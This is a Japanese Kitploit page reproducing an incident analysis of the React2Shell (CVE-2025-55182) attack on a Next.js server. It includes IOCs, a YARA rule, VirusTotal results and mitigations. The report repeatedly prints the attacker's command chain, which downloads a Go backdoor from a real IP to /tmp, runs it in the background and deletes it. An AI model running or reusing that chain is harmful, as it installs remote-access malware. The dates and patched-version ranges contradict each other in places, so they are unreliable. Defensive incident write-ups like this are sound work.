Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-Attack-Analysis — CVE-2025-55182 (React2Shell) の実際の攻撃分析 - React Server Components RCE脆弱性 | Kitploit
ツール/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
侵害指標 (IOC) 管理脆弱性分析フォレンジックウェブセキュリティマルウェア分析脅威インテリジェンス学習と教育インシデントレスポンス
GitHub

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

CVE-2025-55182 (React2Shell) の実際の攻撃分析 - React Server Components RCE脆弱性

リポジトリを見る
69ヶ月前未レビュー

CVE-2025-55182 攻撃分析: React Server Components RCE

本番環境のNext.jsアプリケーションに対する実際の攻撃分析

📋 目次

  • エグゼクティブサマリー
  • 脆弱性概要
  • 攻撃タイムライン
  • 技術的分析
  • マルウェア分析
  • 侵害指標 (IOCs)
  • 緩和策と対応
  • 学んだ教訓
  • 参考文献

エグゼクティブサマリー

2025年12月5日、本番環境のNext.jsアプリケーションが、React Server Componentsにおける重大なリモートコード実行脆弱性 CVE-2025-55182 (React2Shell) を悪用する攻撃者に標的にされました。この攻撃は、サーバー上でLinuxバックドアトロイの木馬をダウンロードし実行しようと試みました。

属性値
CVE IDCVE-2025-55182
CVSS スコア9.8 (Critical)
攻撃日2025年12月5日
攻撃結果✅ ブロック済み (パッチ後)
マルウェアタイプLinux バックドアトロイの木馬
影響を受けたスタックNext.js + React Server Components

脆弱性概要

CVE-2025-55182 とは?

CVE-2025-55182 (通称 "React2Shell") は、React Server Components (RSC) に影響を与える重大なリモートコード実行 (RCE) 脆弱性です。影響を受けるバージョン:

  • React: バージョン 19.0.0 - 19.2.1
  • Next.js: バージョン 15.x および 16.x (パッチ適用前)

根本原因

この脆弱性は、ReactのFlight Server内の renderToReadableStream() 関数に存在します。特別に細工されたRSCペイロードを処理する際、サーバーが特定の入力を適切にサニタイズできず、任意のコード実行に至ります。

攻撃ベクトル

root@kitploit:~
攻撃者 → 悪意のあるRSCペイロード → Flight Server → eval() → RCE

攻撃者は、悪意のあるシリアル化されたペイロードを含む細工されたPOSTリクエストを送信し、それがサーバー上でデシリアライズされて実行されます。


攻撃タイムライン

フェーズ1: 初期の悪用試行 (パッチ前)

タイムスタンプ (UTC)イベント
Dec 5, 06:20Sentry 経由で最初の攻撃を検出
Dec 5, 06:20ペイロードがシェルコマンドの実行を試行
Dec 5, 06:20攻撃が部分的に成功 (パッチ前)

Sentry エラーログ (パッチ前):

root@kitploit:~
Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

フェーズ2: パッチの展開

タイムスタンプアクション
Dec 4, 14:13Next.js 16.0.7 にアップグレード
Dec 4, 14:13パッチ適用バージョン (v1.0.0-beta-4) をデプロイ

フェーズ3: パッチ後の攻撃ブロック

タイムスタンプ (UTC)イベント
Dec 5, 08:48攻撃試行を検出
Dec 5, 08:48ペイロード実行をブロック
Dec 5, 08:48エラー: syntax error: unexpected ";"

Sentry エラーログ (パッチ後):

root@kitploit:~
Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

パッチにより悪意のあるコマンドの実行が正常に防止されました。


技術的分析

攻撃リクエスト詳細

属性値
ターゲットURLhttps://[REDACTED]/

ペイロード分析

攻撃者は以下のコマンドチェーンの実行を試みました:

root@kitploit:~
wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

内訳:

サーバー環境

コンポーネントバージョン
OSAlpine Linux 3.23.0
ランタイムNode.js v20.19.6
フレームワークNext.js 16.0.7 (パッチ適用済み)

マルウェア分析

ファイル情報

VirusTotal 結果

検出率: 13/72 (18%)

VirusTotal リンク: 分析を表示

バイナリ分析

ELF ヘッダ:

root@kitploit:~
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

特定された機能:

抽出された文字列 (関連):

root@kitploit:~
crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

トリガーされたIDSルール

深刻度ルールソース
LOWET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
LOWET DNS Query for .cc TLDProofpoint ET Open

マルウェア分類

タイプ: Linux バックドアトロイの木馬

機能:

  • リモートシェルアクセス
  • コマンド&コントロール (C2) 通信
  • ファイルのアップロード/ダウンロード
  • 暗号化通信
  • SOCKS5 によるトラフィックトンネリング
  • 永続化メカニズム

侵害指標 (IOCs)

ネットワークIOC

ファイルIOC

行動IOC

YARA ルール

root@kitploit:~
rule CVE_2025_55182_Backdoor {
    meta:
        description = "Detects backdoor distributed via CVE-2025-55182"
        author = "Security Researcher"
        date = "2025-12-05"
        hash = "0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce"
    
    strings:
        $elf = { 7F 45 4C 46 }
        $go1 = "vendor/golang.org/x/crypto" ascii
        $go2 = "vendor/golang.org/x/net" ascii
        $net1 = "net/http" ascii
        $net2 = "socks5" ascii
        $crypto1 = "crypto/tls" ascii
        $crypto2 = "chacha20poly1305" ascii
    
    condition:
        $elf at 0 and
        (2 of ($go*)) and
        (1 of ($net*)) and
        (1 of ($crypto*))
}

緩和策と対応

実行された即時アクション

不正利用報告

2025年12月5日付で、C2サーバーのホスティングプロバイダーであるVultrに対して不正利用報告を提出しました。内容は以下の通り:

  • 悪意のあるIPアドレスとURL
  • マルウェアのSHA256ハッシュ
  • VirusTotal分析リンク
  • 攻撃ベクトル (CVE-2025-55182) の説明

パッチ適用済みバージョン

パッケージ脆弱性ありパッチ済み
Next.js< 15.3.3, < 16.0.5≥ 15.3.3, ≥ 16.0.5
React19.0.0 - 19.1.0≥ 19.2.1 (2025年6月以降)

推奨される緩和策

1. 直ちにアップグレード:

root@kitploit:~
# For Next.js 16.x
npm install [email protected] [email protected] [email protected]

# For Next.js 15.x
npm install [email protected] [email protected] [email protected]

2. 悪意のあるIPをブロック:

root@kitploit:~
# iptables
sudo iptables -A INPUT -s 45.76.155.14 -j DROP
sudo iptables -A OUTPUT -d 45.76.155.14 -j DROP

# UFW
sudo ufw deny from 45.76.155.14
sudo ufw deny to 45.76.155.14

3. IOC を監視:

root@kitploit:~
# Check for suspicious files
find /tmp -type f -executable 2>/dev/null

# Check for suspicious processes
ps aux | grep -E "(vim|/tmp/)"

# Check network connections
netstat -an | grep "45.76.155.14"

4. すべてのシークレットをローテーション:

  • データベース認証情報
  • JWT シークレット
  • API キー
  • セッションシークレット

学んだ教訓

良かった点

  1. Sentry 監視 で攻撃を即座に検出
  2. CVE 公開から数時間以内に 迅速なパッチ展開
  3. Docker コンテナ化 により影響範囲を限定
  4. パッチ後 の保護で後続の攻撃を正常にブロック

改善すべき点

  1. より迅速なパッチ適用 - CVE公開からパッチまでの時間を短縮
  2. WAF ルール - RSC 悪用試行を検出するためのルール追加
  3. 出力フィルタリング - 未知のIPへのアウトバウンド接続をブロック
  4. 自動アラート - 不審なシェルコマンドに対するアラート設定

セキュリティ推奨事項


参考文献

公式アドバイザリ

  • Next.js セキュリティアドバイザリ
  • React セキュリティアップデート
  • CVE-2025-55182 詳細

分析リソース

  • VirusTotal 分析
  • MalwareBazaar

使用ツール

  • Sentry - エラー監視
  • VirusTotal - マルウェア分析
  • Docker - コンテナ化

免責事項

このレポートは 教育および防御目的 でのみ公開されています。マルウェアバイナリはこのリポジトリには含まれていません。セキュリティ研究者は、提供されたSHA256ハッシュを使用してVirusTotalからサンプルを入手できます。


著者

公開: 2025年12月5日

連絡先: [あなたの連絡先情報またはGitHubプロフィール]


ライセンス

この分析は CC BY 4.0 の下で公開されています。適切な帰属表示を行えば、この資料を自由に共有および改変できます。


変更履歴

日付バージョン変更内容
2025-12-051.0初版公開
ツールをダウンロード
メソッド
POST
ユーザーエージェントPython Requests 2.31
発信元自動化された攻撃スクリプト
ステップコマンド目的
1wget http://45.76.155.14/vim -O /tmp/vimマルウェアのダウンロード
2chmod +x /tmp/vim実行可能にする
3nohup /tmp/vim > /dev/null 2>&1 &バックグラウンドで実行し、ログアウト後も持続
4rm -f /tmp/vim証拠の削除
コンテナ
Docker
属性値
ファイル名vim (正規のツールに偽装)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
ファイルタイプELF 64-bit LSB executable, x86-64
言語Go (コンパイル済みバイナリ)
ファイルサイズ~4.7 MB
ベンダー検出名
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292
機能証拠
HTTP/HTTPS クライアントnet/http, *http.Client
TLS 暗号化crypto/tls, crypto/aes
SOCKS5 プロキシsocks, socks5
DNS 解決net/dns/dnsmessage
強力な暗号chacha20poly1305, Ed25519
タイプ値説明
IP アドレス45.76.155.14マルウェア配布サーバー
URLhttp://45.76.155.14/vimマルウェアダウンロードURL
ホスティングVultr VPSクラウドプロバイダー
TLD.ccC2 ドメインが .cc TLD を使用
タイプ値
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[必要に応じて計算]
MD5[必要に応じて計算]
ファイル名vim (偽装)
ファイルタイプELF 64-bit x86-64
ファイルサイズ~4.7 MB
指標説明
外部IPへの wget非標準URLからのダウンロード
/tmp/ 内のファイル一時ディレクトリ内の不審な実行ファイル
nohup + バックグラウンド実行永続化の試み
即時のファイル削除証拠隠滅
Python Requests User-Agent自動化された攻撃ツール
アクションステータス詳細
✅ Next.js のアップグレード完了済み16.0.4 → 16.0.7
✅ React のアップグレード完了済み19.1.0 → 19.2.1 (パッチ済み)
✅ アプリケーションの再デプロイ完了済みDocker リビルド
✅ マルウェアの分析完了済みVirusTotal への提出
✅ ホスティング事業者への報告完了済みVultr への不正利用報告を送信
⏳ 認証情報のローテーション保留中データベース、JWT、API キー
カテゴリ推奨事項
監視リアルタイムのエラー監視 (Sentry など) を実装
アップデートすべての依存関係のセキュリティアドバイザリに登録
ネットワーク出力フィルタリングを実装し、不要なアウトバウンドをブロック
コンテナ非rootで実行、読み取り専用ファイルシステムを使用
シークレット認証情報を定期的にローテーション、シークレットマネージャーを使用